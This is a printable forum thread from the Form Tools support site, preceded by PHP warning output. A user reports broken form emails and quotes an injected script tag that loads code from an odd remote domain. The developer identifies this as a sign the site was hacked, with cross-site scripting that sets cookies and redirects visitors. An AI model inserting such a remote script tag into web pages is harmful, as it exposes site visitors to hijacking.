The following warnings occurred:
Warning [2] Undefined array key "avatartype" - Line: 783 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 783 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined array key "avatartype" - Line: 783 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 783 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined variable $newpmmsg - Line: 40 - File: global.php(841) : eval()'d code PHP 8.1.31 (Linux)
File Line Function
/global.php(841) : eval()'d code 40 errorHandler->error
/global.php 841 eval
/printthread.php 16 require_once
Warning [2] Undefined array key "style" - Line: 909 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 909 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined property: MyLanguage::$lang_select_default - Line: 5024 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 5024 errorHandler->error
/global.php 909 build_theme_select
/printthread.php 16 require_once
Warning [2] Undefined array key "additionalgroups" - Line: 7162 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 7162 errorHandler->error
/inc/functions.php 5044 is_member
/global.php 909 build_theme_select
/printthread.php 16 require_once
Warning [2] Undefined array key 1 - Line: 1415 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 1415 errorHandler->error
/inc/functions.php 1370 fetch_forum_permissions
/printthread.php 76 forum_permissions
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error



Form Tools
Email Problem - Printable Version

+- Form Tools (https://forums.formtools.org)
+-- Forum: Form Tools (https://forums.formtools.org/forumdisplay.php?fid=1)
+--- Forum: General Discussion (https://forums.formtools.org/forumdisplay.php?fid=5)
+--- Thread: Email Problem (/showthread.php?tid=680)



Email Problem - prestodesigns - May 2nd, 2010

Hey,

My submission emails were working fine up until yesterday morning. I didn't change anything or even log into formtools until today. Also when I try to send a test email nothing happens and if I click "Display Email" in the Test email section I get an error saying... Error: SyntaxError: Badley formed JSON string: '/n/n/n/n/n/n/n/n/n/n/n"

Also I noticed this script in the source code of the edit email page.
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

Any help would be great!


RE: Email Problem - badolm - May 4th, 2010

(May 2nd, 2010, 10:50 AM)prestodesigns Wrote: Hey,

My submission emails were working fine up until yesterday morning. I didn't change anything or even log into formtools until today. Also when I try to send a test email nothing happens and if I click "Display Email" in the Test email section I get an error saying... Error: SyntaxError: Badley formed JSON string: '/n/n/n/n/n/n/n/n/n/n/n"

Also I noticed this script in the source code of the edit email page.
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

Any help would be great!

maybe something wrong at your template emails...text or html...try configure that again and test ...i ve got that error sometime


RE: Email Problem - Ben - May 6th, 2010

*** IMPORTANT!! ***

It looks like your site has been hacked. The file you linked to contains some cross-site scripting code to set a cookie and redirect to a different URL. Even if it's not working, it means your site was compromised at some point.

I'd suggest contacting your hosting provider as soon as possible to see if they can shed some light on this.

My own site got hacked once due to me running an older version of Wordpress. Unfortunately, it can be an absolute devil figuring out where the security hole lay.

I can assure you though that Form Tools is pretty secure - I very much doubt that it would be the cause.

Good luck...! Sad

- Ben